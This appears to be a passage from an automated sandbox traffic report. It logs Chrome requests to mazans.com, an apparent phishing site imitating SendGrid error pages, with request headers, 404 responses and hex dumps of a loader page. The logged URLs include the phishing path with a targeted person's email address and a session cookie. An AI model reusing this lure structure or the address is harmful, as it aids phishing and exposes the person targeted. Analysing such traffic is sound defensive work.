                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:09 UTC728OUTGET /https://sendgrid.com/error/etc.clientlibs/clientlibs/granite/jquery.lc-f9e8e8c279baf6a1a278042afe4f395a-lc.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.com
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: PHPSESSID=760389281e5877a1c07bb48e8e0ac3a9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:09 UTC261INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:09 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 07 Sep 2022 17:01:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 583
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:09 UTC583INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          19192.168.2.1749780162.241.85.1724436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:09 UTC727OUTGET /https://sendgrid.com/error/etc.clientlibs/clientlibs/granite/utils.lc-899004cc02c33efc1f6694b1aee587fd-lc.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.com
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: PHPSESSID=760389281e5877a1c07bb48e8e0ac3a9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:10 UTC261INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:09 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 07 Sep 2022 17:01:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 583
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:10 UTC583INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          20192.168.2.1749779162.241.85.1724436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:09 UTC746OUTGET /https://sendgrid.com/error/etc.clientlibs/twilio-foundation/clientlibs/clientlib-site.lc-65e4613a26158083e3e99e53ac7ff36f-lc.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.com
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: PHPSESSID=760389281e5877a1c07bb48e8e0ac3a9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:10 UTC261INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:09 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 07 Sep 2022 17:01:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 583
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:10 UTC583INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          21192.168.2.1749784162.241.85.1724436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:09 UTC745OUTGET /https://sendgrid.com/error/etc.clientlibs/sendgrid/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.com
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: PHPSESSID=760389281e5877a1c07bb48e8e0ac3a9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:10 UTC261INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:09 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 07 Sep 2022 17:01:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 583
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:10 UTC583INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          22192.168.2.1749781162.241.85.1724436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:09 UTC737OUTGET /https://sendgrid.com/error/etc.clientlibs/sendgrid/clientlibs/clientlib-site.lc-47fa670601ba9b5db3afd22023c57f06-lc.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.com
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: PHPSESSID=760389281e5877a1c07bb48e8e0ac3a9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:10 UTC261INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:09 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 07 Sep 2022 17:01:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 583
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:10 UTC583INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          23192.168.2.1749770184.28.90.27443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:09 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                                                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Range: bytes=0-2147483646
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                                                                                                          Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:10 UTC514INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                                                                                                                                          X-CID: 11
                                                                                                                                                                                                                                                                                                                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                                                                                                          X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=87389
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:10 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 55
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          X-CID: 2
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:10 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          24192.168.2.1749796162.241.85.1724436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:10 UTC795OUTGET /https://sendgrid.com/error/etc.clientlibs/core/wcm/components/commons/datalayer/v1/clientlibs/core.wcm.components.commons.datalayer.v1.lc-70264651675213ed7f7cc5a02a00f621-lc.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.com
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: PHPSESSID=760389281e5877a1c07bb48e8e0ac3a9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:10 UTC261INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:10 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Wed, 07 Sep 2022 17:01:41 GMT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 583
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:10 UTC583INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin {


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          25192.168.2.174979966.235.152.1564436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:10 UTC675OUTPOST /rest/v1/delivery?client=twilio&sessionId=ead54cbe71824480b6163d2cf14e5e54&version=2.11.4 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: twilio.tt.omtrdc.net
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 1053
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          Origin: https://mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://mazans.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
